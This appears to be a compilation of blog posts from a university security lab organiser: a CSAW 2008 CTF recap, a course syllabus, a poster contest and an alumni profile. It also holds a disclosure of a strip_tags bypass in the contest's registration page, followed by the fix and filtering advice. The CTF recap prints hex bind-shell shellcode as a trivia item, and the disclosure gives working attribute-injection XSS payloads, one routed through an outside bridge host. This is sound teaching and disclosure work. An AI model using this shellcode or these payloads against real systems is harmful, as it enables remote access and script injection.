“A digital cyber attack and defense competition in detecting application security vulnerabilities.”

…but shhhhh! Don’t tell marketing, there is absolutely no defense involved! . I believe that attack has merits on its own, but that is a discussion for another time.

CSAW CTF started out in 2004 as a network-based game with dozens of virtual machines running known vulnerable software. The challenge was to discover and detect these issues and then find or tweak public exploits to work on them. This could have been a good way to run CTF, but we simply couldn’t afford the time to make it work properly. I ended up taking second place to Michael Aiello, now a close friend of mine, that year. Afterwards, Mike and I sacrificed our chances of winning the next year by helping develop the 2005 contest and, along with other members of the lab, changed the game’s format to how it remains to this day.

In CSAW CTF, participants are given a series of challenges divided into different categories and each challenge is worth a specified number of points. In reality, a “challenge” is a small bit of code with a single security vulnerability implanted in it. “Solving” the challenge means exploiting this vulnerability. The challenge spits out a secret password upon completion which the participant can redeem for points on the scoreboard. We relate this to events like the Defcon Pre-quals without the requirement that participants solve easier challenges first to reach the harder ones. We try to keep a similarly wide breadth of categories; this year we had Web Applications, Binary Exploitation, Reverse Engineering, Trivia, and Bug Hunting. If you’re interested in what the challenges were then pay attention to, what will likely be called, the OWASP CTF Project which this year’s CSAW CTF has been donated to. I expect all that to be ready within a week or two and I will definitely make a separate blog post about it.

This year’s CSAW CTF was our largest ever. We had 46 teams, over 150 individual players, and 50 different schools compete in it (all students too!), putting us at one of the largest CTF competitions world-wide. It’s gotten to the point where I can name a few, and only a few, other competitions that are larger than we are.

CSAW08 CTF started at 8pm EST on Friday, September 19th and it quickly become clear which teams would end up in the top 10. MyLittlePwnies, a team of 8 from NPS, methodically solved a majority of the challenges that very first night and got off to an early lead. To my surprise, a small handful of other teams trailed close behind and before the night was over RPISEC passed them by! This was not good news for me because between trying to work out the kinks people were finding and answering questions (it was basically a one-man-show this year), I didn’t have much time to put up new challenges. Let that be a lesson for everyone else planning CTFs out there: always work with a partner, no matter how smooth you think the scoring system is!

As a low-cost way of getting a binary exploitation challenge up, I gave everyone Lurene Grenier’s Advanced WIndows Buffer Overflow (AWBO) #2 to chew on. For a challenge that comes with the warning:

“This next test could take a very, very long time. If you become lightheaded from thirst, feel free to pass out. An intubation associate will be dispatched to revive you with peptic salve and adrenaline.”

… I expected this to buy me some time but 5 teams solved AWBO#2 and some did it within 2 hours. One team even solved it on Vista just because they had no other Windows installations available. Those teams were: TeamTefaye, RPISEC, MyLittlePwnies, teamSparta, and FluxFingers. Congratulations guys, that was really impressive!

The final trivia question for that night was: What does this code do? 31C04089460C89C34089460804048946108D4E08B066CD8089C231
C0C646080266C7460A358289460C8956118D4E08894E154389D980
C10E894E198D4E11B066CD80B0664343CD8031C043894615894619
B066CD8089C331C089460C89C1B03FCD8041B03FCD8041B03FCD80
EB1A5E31C08846098D1E895E0B89460FB00B89F38D4E0B8D560FCD80
E8E1FFFFFF2F62696E2F62617368

Right after I posted it, I made sure to remind MyLittlePwnies since they were asking me for something exploitation or reversing related. Here is my conversation with one of their team members (hint: check the timestamps).

(1:52:15 AM) dan: btw, you saw the trivia right?
(1:53:54 AM) blacksheep: yup, just saw that.
(1:54:34 AM) blacksheep: trivia answer is
(1:55:02 AM) blacksheep: bind port backdoor shell on port 13698 on a linux system with /bin/bash as the shell

I gave them extra points for such a fast answer . The second day ended with RPISEC in first, by a small margin, over Team Tefaye and Pwntatoes in a distant third.

The last day of the competition was a short one, the game was over at 3pm EST on Sunday, September 21st. The only challenges any teams really had time to do were some of the more open-ended ones like the “Client-side Challenge” which I’ll now explain. In the Client-side Challenge, you are taking a class with “Joe the TA” and you really want to break into either his e-mail or his local computer for advance information about tests and homeworks. He handed out his e-mail to you at the beginning of the semester and you know that he logs in to a webmail installation conveniently hosted on the CTF server. “Joe” also tends to click on any link that looks convincing. Teams were given 500 points for access to his mail spool, 1000 points for access to his filesystem, and 400 points if they could persist that access across the “semester” (a rootkit, an email forward, a persistent XSS, etc). Let me tell you, NEVER click on a link from Team Tefaye! Their first try set up an e-mail forward, a persistent XSS, and stole my session cookies while forwarding me to the intended link target described in their e-mail all in a single action. They returned later and trojaned the box for an extra 1000 points. Damn! This finally put Team Tefaye in a solid lead over RPISEC which they were able to maintain until the end of the contest.

Here’s the final scoreboard:

Team Tefaye took first, RPISEC took second, and Pwntatoes took third. The Down Ownerz got the bonus prize for being the youngest team playing. Congratulations guys!

There was a lot of great stuff that went on last weekend and I’m sorry I couldn’t get to all of it in this blog post. If any of the people who played have more to say, post it in a comment.

rgov from RPISEC: “(Bonus: I was able to use cross-site scripting to RickRoll most of the players and some of the organizers.)” Yep, NoScript doesn’t work so well when you whitelist the domain

Rob Escriva from RPISEC: “This weekend I’ll be doing a writeup on a bug I found in the “leaky” challenge of the 2008 CSAW contest.”

I almost forgot, I have a few people to thank for helping out in various ways with CTF: Alicia Bozyk, Aleksey, Dean De Beer, Stephen Ridley, Michael Aiello, and Eric Hulse. Thanks guys!

Today, that is going to change. I uploaded my hand-picked favorites from the last 3 years to my web site for the entire web to enjoy! I tried to mark who made what poster in the title but please leave me a message if I missed yours.

Amanda Morante's 1st place entry from 2006

View the full library of awareness poster images here.

Registration for CSAW 2008 is still open and we will be having the Security Awareness Poster contest again, in addition to 6 other contests. If you know any graphic designers, convince them to join!

The instructor for the course is Nasir Memon with TA’s Dan Guido (me) and Vikram Padman. The syllabus has been finalized and the guest professors as well as their respective topics are as follows:

• Sept 4th — Introduction and CSAW, Dan Guido
• Sept 11th — Source Code Analysis, Dan Guido
• Sept 18th — Reverse Engineering, Stephen A. Ridley
• Sept 25th — Reverse Engineering, Stephen A. Ridley

• October 2nd — Overflows, Dino Dai Zovi
• October 9th — Overflows, Dino Dai Zovi
• October 16th — TAKE-HOME MIDTERM
• October 23rd — Fuzzing, Mike Zusman
• October 30th — Fuzzing, Mike Zusman

• November 6th — Client-side attacks, Dean De Beer
• November 13th — Client-side attacks, Dean De Beer
• November 20th — Web Hacking, Erik Cabetas
• November 27th — Web Hacking, Erik Cabetas

• December 4th — FINAL PROJECTS
• December 11th — hack the planet/show off projects

Students will have to complete one homework assignment every two weeks, a take-home midterm, and do a final project of their choosing. Each two week session will contain one full session of Q&A to review the homework associated with it. Extra credit will be given for participating in CSAW and UCSB iCTF.

Any questions about the course can be e-mailed to me at dguido@gmail.com.

EDIT: The course will be held in room RH227

When Stan Nurilov attended Polytechnic Institute of New York University in an accelerated bachelor’s/master’s of computer science program from 2002 to 2006, he truly enjoyed the technical courses he took in areas like operating systems and databases.

But it wasn’t until he graduated and began working as a software developer/project leader for a branch of the U.S. military that Nurilov fully appreciated the project-level courses that taught him about leadership qualities.

“Those classes really help me when I need to work with customers and gain collaboration on projects,” he says.

Stan is a graduate of our SFS program that pays for two years of tuition, rent, and other expenses in exchange for a commitment to work at a government agency for two years.

Head over to ComputerWorld and read the rest of the article!

//don't use this script!
foreach ($_COOKIE as &$cookie) {
  $cookie = trim(strip_tags(@mysqli_real_escape_string($mySQL, $cookie)));
}
foreach ($_POST as &$post) {
  if (is_array($post)) {
    foreach ($post as &$_post) {
      $_post = trim(strip_tags(@mysqli_real_escape_string($mySQL, $_post)));
    }
  }
  else {
    $post = trim(strip_tags(@mysqli_real_escape_string($mySQL, $post)));
  }
}

Additionally, the registration script limits sources of user controllable input by only ever using the POST and COOKIE superglobals.

This script eliminates potential SQL injections by calling mysqli_real_escape_string on all user input. The *_real_escape_string functions in PHP are the only safe way to prevent SQL injection attacks as there are ways to sneak attacks by the [deprecated] *_escape_string and addslashes functions, for example, with different character encodings.

After being processed by mysql_real_escape_string, all user input is then filtered through strip_tags, a function which one might think would prevent cross-site-scripting attacks by completely removing any HTML and PHP tags it finds. strip_tags works through many different encodings and very effectively strips tags, however, seasoned web hackers will be saying at this point “there are other ways to inject javascript without tags!” and they would be right.

The easiest way to avoid strip_tags is to inject a quote to close the current attribute, create a giant block with a new CSS style attribute, and make it evaluate javascript onmouseover. Using an example from the sla.ckers.org forum and .mario himself:

" onwhatever=alert(1) a="

This accomplishes the goal of injecting javascript into the target application without creating any additional HTML or PHP tags, and strip_tags won’t pick it up!

I asked .mario if he would be kind enough to provide us with a proof of concept that would work specifically in the context of the CSAW registration page. He did not disappoint and PM’d me the following attack string:

http://evil.hackademix.net/name.xss/***http://isis.poly.edu/csaw/register?name=”style=”a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;”onmouseover=alert(/XSS/[-1]);eval(name) a=”***content,post

*** This has been URL decoded.
*** For the original, please see http://preview.tinyurl.com/csawxss

His attack utilizes a service Giorgio Maone wrote (the name.xss part of the URL) to launch XSS attacks on websites that limit user input to parameters other than GET, as ours does. The attack works as I described above, by adding new attributes into the existing tag and creating a large CSS block that triggers javascript onmouseover. Interestingly, this complicated attack string is processed as javascript by all the major browsers including IE8, Firefox 3, Opera 9.51, and Safari 3! I was really impressed.

After verifying the PoC, I made a small addition to our filtering script to prevent this attack by adding an htmlentities function call to each iteration of the two loops. This isn’t the best solution as it escapes input more than is necessary and I didn’t have a chance to bug test it much at all. A better solution can be found in the same sla.ckers.org forum post I found the attack string in:

…the best practice is IMHO:

Input -> Validate -> Filter (CRLF, Ctrl-Chars) -> Escape -> Store -> Encode (Just the characters you need to encode) -> Output

Validation can be done via type check or regex, for filtering the ord() method does a great job, escaping is done by mysql_(real)_escape_string() and encoding is done by correctly parametrized htmlentities().

We’ll be looking into ways to rewrite our filtering script according to this advice, and also at PHP-IDS, as a way to prevent these types of issues in the future.

Thanks .mario!

EDIT 08/17/2008: I incorrectly attributed the name.xss bridge to mario. It is actually the creation of Giorgio Maone.

I’ll try and keep you informed as to how the contest is going, what it’s like to compete in one of these things, and if we are winning by live-blogging the event from our hotel room each night. I don’t see that banned in any of the dozens of rules we’ve been made aware of so far!-26 hours: It’s 2 hours before we leave for Rochester and I’ve come down with a cold, it has started snowing throughout Northern NY, and the team collectively realized we don’t have a GPS unit for the 6 hour drive. Instead, we will be navigating via iPhone. Make sure to keep an eye on CNN tonight for reports of a van full of computer nerds barreling off I-80 into a ditch.

-12 hours: We made it, and not a single wrong turn! But you see this? That’s a 4-seater. We had 5 people. Oops! I think one of Mike, Alex, or Brad is going to bill Prof. Memon for a butt-massage after sitting 6 hours on a bunch of cup holders. Thanks guys for not complaining!

Strat is coming up by train tomorrow and I think someone will be going home with him the same way .

We still have no idea what to expect for this competition. The only thing we’ve seemed to agree on so far is that it’s impossible for the Red Team not to have some advance knowledge of the competition machines. We can’t see how this will be much of a challenge once we put our uber-firewall in place. We’ll see.

+10 hours: see the comments below

Attached files:

• NECCDC Policy Docs
• Security Approach/Philosophy

The list is going to be informal and of average volume.